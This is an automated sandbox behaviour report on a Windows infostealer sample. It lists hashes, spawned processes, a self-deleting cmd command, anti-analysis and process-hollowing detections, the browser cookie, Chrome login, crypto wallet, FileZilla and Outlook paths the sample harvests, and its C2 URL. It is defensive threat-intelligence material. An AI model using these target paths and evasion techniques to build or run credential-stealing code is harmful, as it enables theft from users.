784Exes_3def155b4c3c49e69e2f76499de14034_exe_2019-09-03_08_30.txt

  1.  
  2. * ID: 784
  3. * MalFamily: "Malicious"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_3def155b4c3c49e69e2f76499de14034.exe"
  8. * File Size: 540672
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "db6309a594ea596569a878d8a692b83abe35aa33b2c2b39aa81615005c0d30ac"
  11. * MD5: "3def155b4c3c49e69e2f76499de14034"
  12. * SHA1: "72a9f61dcdbf43e2cb40f5fe171008c2aa70cc63"
  13. * SHA512: "28c221ebe2899034a902584eed7fb08b4341011c1e5cced3dc771451a95032807d1a49aac2ff259f4f97eed26d58767736387ff1a6a3c91b4699561e965f4ed8"
  14. * CRC32: "2C4801B7"
  15. * SSDEEP: "6144:SsJcPyFZfh/EkIafaUEl8GEnwwcTRvpM9/5V2MYfG6jqoHTshzjJ3gFKxrNVt3gr:SMLZ/gNdl8CB0WMYfPO1TrXtB"
  16.  
  17. * Process Execution:
  18. "fo1GrAw0yY7y3v.exe",
  19. "fo1GrAw0yY7y3v.exe",
  20. "cmd.exe",
  21. "timeout.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "WmiApSrv.exe",
  25. "svchost.exe",
  26. "svchost.exe",
  27. "WMIADAP.exe",
  28. "WmiPrvSE.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "\"C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe\"",
  33. "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
  34. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
  35. "C:\\Windows\\system32\\lsass.exe",
  36. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  37. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  38. "C:\\Windows\\system32\\timeout.exe 3"
  39.  
  40.  
  41. * Signatures Detected:
  42.  
  43. "Description": "Behavioural detection: Executable code extraction",
  44. "Details":
  45.  
  46.  
  47. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  48. "Details":
  49.  
  50.  
  51. "Description": "Possible date expiration check, exits too soon after checking local time",
  52. "Details":
  53.  
  54. "process": "fo1GrAw0yY7y3v.exe, PID 2200"
  55.  
  56.  
  57.  
  58.  
  59. "Description": "Anomalous file deletion behavior detected (10+)",
  60. "Details":
  61.  
  62. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp"
  63.  
  64.  
  65. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp"
  66.  
  67.  
  68. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp"
  69.  
  70.  
  71. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp"
  72.  
  73.  
  74. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp"
  75.  
  76.  
  77. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  78.  
  79.  
  80. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  81.  
  82.  
  83. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
  84.  
  85.  
  86. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
  87.  
  88.  
  89. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
  90.  
  91.  
  92. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
  93.  
  94.  
  95. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
  96.  
  97.  
  98. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
  99.  
  100.  
  101. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
  102.  
  103.  
  104. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
  105.  
  106.  
  107. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
  108.  
  109.  
  110. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
  111.  
  112.  
  113. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
  114.  
  115.  
  116. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
  117.  
  118.  
  119. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
  120.  
  121.  
  122. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
  123.  
  124.  
  125. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
  126.  
  127.  
  128. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
  129.  
  130.  
  131. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
  132.  
  133.  
  134. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
  135.  
  136.  
  137. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
  138.  
  139.  
  140. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
  141.  
  142.  
  143. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
  144.  
  145.  
  146. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
  147.  
  148.  
  149. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
  150.  
  151.  
  152. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
  153.  
  154.  
  155. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
  156.  
  157.  
  158. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
  159.  
  160.  
  161. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
  162.  
  163.  
  164. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
  165.  
  166.  
  167. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
  168.  
  169.  
  170. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
  171.  
  172.  
  173. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
  174.  
  175.  
  176. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
  177.  
  178.  
  179. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
  180.  
  181.  
  182. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
  183.  
  184.  
  185. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
  186.  
  187.  
  188. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
  189.  
  190.  
  191. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
  192.  
  193.  
  194. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
  195.  
  196.  
  197. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
  198.  
  199.  
  200. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
  201.  
  202.  
  203. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
  204.  
  205.  
  206. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
  207.  
  208.  
  209. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
  210.  
  211.  
  212. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
  213.  
  214.  
  215. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
  216.  
  217.  
  218. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
  219.  
  220.  
  221. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
  222.  
  223.  
  224. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
  225.  
  226.  
  227. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
  228.  
  229.  
  230.  
  231.  
  232. "Description": "Guard pages use detected - possible anti-debugging.",
  233. "Details":
  234.  
  235.  
  236. "Description": "Performs HTTP requests potentially not found in PCAP.",
  237. "Details":
  238.  
  239. "url_ioc": "absetup8.icu:80//index.php"
  240.  
  241.  
  242. "url_ioc": "absetup8.icu:80//index.php"
  243.  
  244.  
  245.  
  246.  
  247. "Description": "A process created a hidden window",
  248. "Details":
  249.  
  250. "Process": "fo1GrAw0yY7y3v.exe -> C:\\Windows\\System32\\cmd.exe"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  256. "Details":
  257.  
  258. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  259.  
  260.  
  261. "suspicious_request_iocs": "http://absetup8.icu/index.php"
  262.  
  263.  
  264.  
  265.  
  266. "Description": "Performs some HTTP requests",
  267. "Details":
  268.  
  269. "url_iocs": "http://absetup8.icu/index.php"
  270.  
  271.  
  272.  
  273.  
  274. "Description": "Uses Windows utilities for basic functionality",
  275. "Details":
  276.  
  277. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  278.  
  279.  
  280. "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  281.  
  282.  
  283.  
  284.  
  285. "Description": "Behavioural detection: Injection (Process Hollowing)",
  286. "Details":
  287.  
  288. "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
  289.  
  290.  
  291.  
  292.  
  293. "Description": "Executed a process and injected code into it, probably while unpacking",
  294. "Details":
  295.  
  296. "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
  297.  
  298.  
  299.  
  300.  
  301. "Description": "Deletes its original binary from disk",
  302. "Details":
  303.  
  304.  
  305. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  306. "Details":
  307.  
  308. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 1896668 times"
  309.  
  310.  
  311.  
  312.  
  313. "Description": "Steals private information from local Internet browsers",
  314. "Details":
  315.  
  316. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  317.  
  318.  
  319. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  320.  
  321.  
  322. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  323.  
  324.  
  325. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  326.  
  327.  
  328. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  329.  
  330.  
  331. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  332.  
  333.  
  334. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  335.  
  336.  
  337. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  338.  
  339.  
  340. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  341.  
  342.  
  343. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  344.  
  345.  
  346. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  347.  
  348.  
  349. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  350.  
  351.  
  352. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  353.  
  354.  
  355. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  356.  
  357.  
  358. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  359.  
  360.  
  361. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  362.  
  363.  
  364. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  365.  
  366.  
  367. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  368.  
  369.  
  370. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  371.  
  372.  
  373. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  374.  
  375.  
  376.  
  377.  
  378. "Description": "Collects information about installed applications",
  379. "Details":
  380.  
  381. "Program": "Google Update Helper"
  382.  
  383.  
  384.  
  385.  
  386. "Program": "Microsoft Excel MUI 2013"
  387.  
  388.  
  389. "Program": "Microsoft Outlook MUI 2013"
  390.  
  391.  
  392.  
  393.  
  394. "Program": "Google Chrome"
  395.  
  396.  
  397. "Program": "Adobe Flash Player 29 NPAPI"
  398.  
  399.  
  400. "Program": "Adobe Flash Player 29 ActiveX"
  401.  
  402.  
  403. "Program": "Microsoft DCF MUI 2013"
  404.  
  405.  
  406. "Program": "Microsoft Access MUI 2013"
  407.  
  408.  
  409. "Program": "Microsoft Office Proofing Tools 2013 - English"
  410.  
  411.  
  412. "Program": "Adobe Acrobat Reader DC"
  413.  
  414.  
  415. "Program": "Microsoft Publisher MUI 2013"
  416.  
  417.  
  418. "Program": "Microsoft Office Shared MUI 2013"
  419.  
  420.  
  421. "Program": "Microsoft Office OSM MUI 2013"
  422.  
  423.  
  424. "Program": "Microsoft InfoPath MUI 2013"
  425.  
  426.  
  427. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  428.  
  429.  
  430. "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  431.  
  432.  
  433. "Program": "Microsoft Word MUI 2013"
  434.  
  435.  
  436. "Program": "Microsoft OneDrive"
  437.  
  438.  
  439. "Program": "Microsoft Groove MUI 2013"
  440.  
  441.  
  442. "Program": "Microsoft Office Proofing Tools 2013 - Español"
  443.  
  444.  
  445.  
  446.  
  447. "Program": "Microsoft Access Setup Metadata MUI 2013"
  448.  
  449.  
  450. "Program": "Microsoft Office OSM UX MUI 2013"
  451.  
  452.  
  453. "Program": "Java Auto Updater"
  454.  
  455.  
  456. "Program": "Microsoft PowerPoint MUI 2013"
  457.  
  458.  
  459. "Program": "Microsoft Office Professional Plus 2013"
  460.  
  461.  
  462. "Program": "Adobe Refresh Manager"
  463.  
  464.  
  465. "Program": "Microsoft Office Proofing 2013"
  466.  
  467.  
  468. "Program": "Microsoft Lync MUI 2013"
  469.  
  470.  
  471.  
  472.  
  473. "Program": "Microsoft OneNote MUI 2013"
  474.  
  475.  
  476.  
  477.  
  478. "Description": "Stack pivoting was detected when using a critical API",
  479. "Details":
  480.  
  481. "process": "svchost.exe:700"
  482.  
  483.  
  484.  
  485.  
  486. "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
  487. "Details":
  488.  
  489. "FireEye": "Generic.mg.3def155b4c3c49e6"
  490.  
  491.  
  492. "McAfee": "Packed-FVG!3DEF155B4C3C"
  493.  
  494.  
  495. "CrowdStrike": "win/malicious_confidence_90% (W)"
  496.  
  497.  
  498. "Invincea": "heuristic"
  499.  
  500.  
  501. "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
  502.  
  503.  
  504. "APEX": "Malicious"
  505.  
  506.  
  507. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  508.  
  509.  
  510. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.hh"
  511.  
  512.  
  513. "Trapmine": "suspicious.low.ml.score"
  514.  
  515.  
  516. "SentinelOne": "DFI - Suspicious PE"
  517.  
  518.  
  519. "Endgame": "malicious (high confidence)"
  520.  
  521.  
  522. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  523.  
  524.  
  525. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  526.  
  527.  
  528. "Acronis": "suspicious"
  529.  
  530.  
  531. "Cylance": "Unsafe"
  532.  
  533.  
  534. "Cybereason": "malicious.dcdbf4"
  535.  
  536.  
  537. "Qihoo-360": "HEUR/QVM03.0.A059.Malware.Gen"
  538.  
  539.  
  540.  
  541.  
  542. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  543. "Details":
  544.  
  545.  
  546. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  547. "Details":
  548.  
  549. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
  550.  
  551.  
  552. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
  553.  
  554.  
  555. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  556.  
  557.  
  558. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
  559.  
  560.  
  561. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  562.  
  563.  
  564. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
  565.  
  566.  
  567. "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
  568.  
  569.  
  570. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
  571.  
  572.  
  573. "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
  574.  
  575.  
  576. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  577.  
  578.  
  579. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
  580.  
  581.  
  582. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  583.  
  584.  
  585. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  586.  
  587.  
  588. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  589.  
  590.  
  591. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  592.  
  593.  
  594. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  595.  
  596.  
  597. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  598.  
  599.  
  600.  
  601.  
  602. "Description": "Harvests credentials from local FTP client software",
  603. "Details":
  604.  
  605. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  606.  
  607.  
  608.  
  609.  
  610. "Description": "Harvests information related to installed instant messenger clients",
  611. "Details":
  612.  
  613. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  614.  
  615.  
  616.  
  617.  
  618. "Description": "Harvests information related to installed mail clients",
  619. "Details":
  620.  
  621. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  622.  
  623.  
  624. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  625.  
  626.  
  627. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  628.  
  629.  
  630. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  631.  
  632.  
  633. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  634.  
  635.  
  636. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  637.  
  638.  
  639. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  640.  
  641.  
  642. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  643.  
  644.  
  645. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  646.  
  647.  
  648. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  649.  
  650.  
  651. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  652.  
  653.  
  654. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  655.  
  656.  
  657. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  658.  
  659.  
  660. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  661.  
  662.  
  663. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  664.  
  665.  
  666. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  667.  
  668.  
  669. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  670.  
  671.  
  672. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  673.  
  674.  
  675. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  676.  
  677.  
  678. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  679.  
  680.  
  681. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  682.  
  683.  
  684.  
  685.  
  686. "Description": "Collects information to fingerprint the system",
  687. "Details":
  688.  
  689.  
  690. "Description": "Uses suspicious command line tools or Windows utilities",
  691. "Details":
  692.  
  693. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  694.  
  695.  
  696. "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  697.  
  698.  
  699.  
  700.  
  701.  
  702. * Started Service:
  703. "VaultSvc",
  704. "wmiApSrv"
  705.  
  706.  
  707. * Mutexes:
  708. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  709. "Global\\RefreshRA_Mutex_Lib",
  710. "Global\\RefreshRA_Mutex",
  711. "Global\\RefreshRA_Mutex_Flag",
  712. "Global\\WmiApSrv",
  713. "Global\\ADAP_WMI_ENTRY"
  714.  
  715.  
  716. * Modified Files:
  717. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  718. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  719. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  720. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  721. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  722. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  723. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  724. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  725. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  726. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  727. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  728. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  729. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  730. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  731. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  732. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  733. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  734. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  735. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  737. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  738. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  739. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  740. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  741. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
